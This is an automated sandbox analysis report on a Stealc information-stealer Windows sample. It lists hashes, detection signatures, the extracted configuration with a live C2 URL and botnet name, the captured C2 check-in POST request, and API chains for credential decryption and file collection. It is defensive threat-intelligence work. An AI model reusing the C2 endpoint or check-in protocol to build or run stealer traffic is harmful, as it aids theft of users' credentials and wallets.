Edit tour

Windows Analysis Report
8WOUWb5iEv.exe

Overview

General Information

Sample name:	8WOUWb5iEv.exe renamed because original name is a hash value
Original sample name:	dbfb5a1fee1df3d86b1cdba9e338b31d.exe
Analysis ID:	1544236
MD5:	dbfb5a1fee1df3d86b1cdba9e338b31d
SHA1:	8ad3ac1b565630891c965f54f4c144da125f572c
SHA256:	54fa4544762fb14d407756fad69201bfaccc8db821a94e63079531d556cddeb1
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Machine Learning detection for sample

Searches for specific processes (likely to inject)

AV process strings found (often used to terminate AV products)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found evaded block containing many API calls

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

8WOUWb5iEv.exe (PID: 6720 cmdline: "C:\Users\user\Desktop\8WOUWb5iEv.exe" MD5: DBFB5A1FEE1DF3D86B1CDBA9E338B31D)

WerFault.exe (PID: 7108 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 1052 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://77.83.175.105/18a9a962225b1ffb.php", "Botnet": "LogsDiller"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1920917794.0000000000860000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.1676570870.0000000002500000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: 8WOUWb5iEv.exe PID: 6720	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 8WOUWb5iEv.exe PID: 6720	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.8WOUWb5iEv.exe.400000.1.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.3.8WOUWb5iEv.exe.2500000.1.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.3.8WOUWb5iEv.exe.2500000.1.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.8WOUWb5iEv.exe.23f0e67.3.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.8WOUWb5iEv.exe.400000.1.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.8WOUWb5iEv.exe.23f0e67.3.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 1 entries

Suricata Signatures

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T04:56:59.964831+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49730	77.83.175.105	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 8WOUWb5iEv.exe

Avira: detected

Found malware configuration

Source: 00000000.00000003.1676570870.0000000002500000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: StealC {"C2 url": "http://77.83.175.105/18a9a962225b1ffb.php", "Botnet": "LogsDiller"}

Multi AV Scanner detection for domain / URL

Source: http://77.83.175.105

Virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for submitted file

Source: 8WOUWb5iEv.exe	ReversingLabs: Detection: 42%
Source: 8WOUWb5iEv.exe	Virustotal: Detection: 39%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 8WOUWb5iEv.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_00419030 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_00419030
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0040C920 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,	0_2_0040C920
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0040A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_0040A210
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_004072A0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_004072A0
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0040A2B0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	0_2_0040A2B0
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_02409297 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_02409297
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_023FA477 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_023FA477
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_023FA517 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	0_2_023FA517
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_023F7507 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_023F7507
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_023FCB87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,	0_2_023FCB87

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Unpacked PE file: 0.2.8WOUWb5iEv.exe.400000.1.unpack

Source: 8WOUWb5iEv.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: my_library.pdbU source: 8WOUWb5iEv.exe, 00000000.00000003.1676570870.0000000002500000.00000004.00001000.00020000.00000000.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: my_library.pdb source: 8WOUWb5iEv.exe, 8WOUWb5iEv.exe, 00000000.00000003.1676570870.0000000002500000.00000004.00001000.00020000.00000000.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_004140F0
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040E530
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040BE40
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040EE20
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00414B60
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00413B00
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040DF10
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00401710
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_004147C0
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040DB80
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040F7B0
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_02404357 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_02404357
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_023FC0A7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_023FC0A7
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_023FF087 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_023FF087
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_023FE177 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_023FE177
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_023FE797 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_023FE797
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_023FFA17 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_023FFA17
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_02404A27 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_02404A27
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_023F1977 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_023F1977
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_02403D67 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_02403D67
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_02404DC7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_02404DC7
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_023FDDE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_023FDDE7

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 77.83.175.105:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://77.83.175.105/18a9a962225b1ffb.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 77.83.175.105Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /18a9a962225b1ffb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGIEHJJJJEBGDAFHJHost: 77.83.175.105Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 38 31 41 36 42 35 46 33 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 2d 2d 0d 0a Data Ascii: ------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="hwid"8A81A6B5F3762778904926------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="build"LogsDiller------IDHDGIEHJJJJEBGDAFHJ--

Source: Joe Sandbox View

ASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL

Source: unknown	TCP traffic detected without corresponding DNS query: 77.83.175.105
Source: unknown	TCP traffic detected without corresponding DNS query: 77.83.175.105
Source: unknown	TCP traffic detected without corresponding DNS query: 77.83.175.105
Source: unknown	TCP traffic detected without corresponding DNS query: 77.83.175.105
Source: unknown	TCP traffic detected without corresponding DNS query: 77.83.175.105
Source: unknown	TCP traffic detected without corresponding DNS query: 77.83.175.105
Source: unknown	TCP traffic detected without corresponding DNS query: 77.83.175.105
Source: unknown	TCP traffic detected without corresponding DNS query: 77.83.175.105

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Code function: 0_2_004048D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_004048D0

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 77.83.175.105Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /18a9a962225b1ffb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGIEHJJJJEBGDAFHJHost: 77.83.175.105Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 38 31 41 36 42 35 46 33 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 2d 2d 0d 0a Data Ascii: ------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="hwid"8A81A6B5F3762778904926------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="build"LogsDiller------IDHDGIEHJJJJEBGDAFHJ--

Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.83.175.105
Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.83.175.105/
Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.83.175.105/18a9a962225b1ffb.php
Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.83.175.105/18a9a962225b1ffb.php%:
Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.83.175.105/18a9a962225b1ffb.php4
Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.83.175.105/18a9a962225b1ffb.phpT
Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.83.175.105/18a9a962225b1ffb.phpk:
Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.83.175.105/7:
Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.83.175.105/AL
Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.83.175.105/d:iU
Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.83.175.105;
Source: Amcache.hve.3.dr	String found in binary or memory: http://upx.sf.net
Source: 8WOUWb5iEv.exe, 8WOUWb5iEv.exe, 00000000.00000003.1676570870.0000000002500000.00000004.00001000.00020000.00000000.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Code function: 0_2_00409E30 memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,

0_2_00409E30

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1920917794.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_024382DF	0_2_024382DF
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0246134F	0_2_0246134F
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0246A08F	0_2_0246A08F
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0244B1CF	0_2_0244B1CF
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_024211DF	0_2_024211DF
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0245A19F	0_2_0245A19F
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_024336EF	0_2_024336EF
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0247A76F	0_2_0247A76F
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0242F4FF	0_2_0242F4FF
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0244A5FF	0_2_0244A5FF
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0242159F	0_2_0242159F
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0245CA0F	0_2_0245CA0F
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_02433A0F	0_2_02433A0F
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_02469AAF	0_2_02469AAF
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_02478B64	0_2_02478B64
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_02435B2F	0_2_02435B2F
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0246C805	0_2_0246C805
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0241D9AB	0_2_0241D9AB
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0245FFEF	0_2_0245FFEF
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_02465C00	0_2_02465C00
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0244AD0F	0_2_0244AD0F
Source: C:\Users\user\Desktop\8WOUWb5iEv.exe	Code function: 0_2_0245ED3D	0_2_0245ED3D

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Code function: String function: 00404610 appears 317 times

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 1052

Source: 8WOUWb5iEv.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.1920917794.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: 8WOUWb5iEv.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@2/5@0/1

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Code function: 0_2_00418810 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00418810

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

Code function: 0_2_00413970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00413970

Source: C:\Users\user\Desktop\8WOUWb5iEv.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\BELOWZON.htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6720

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\36bdbd5a-eb9e-4cb9-ab5a-c956dd20c6fa

Jump to behavior

Source: 8WOUWb5iEv.exe

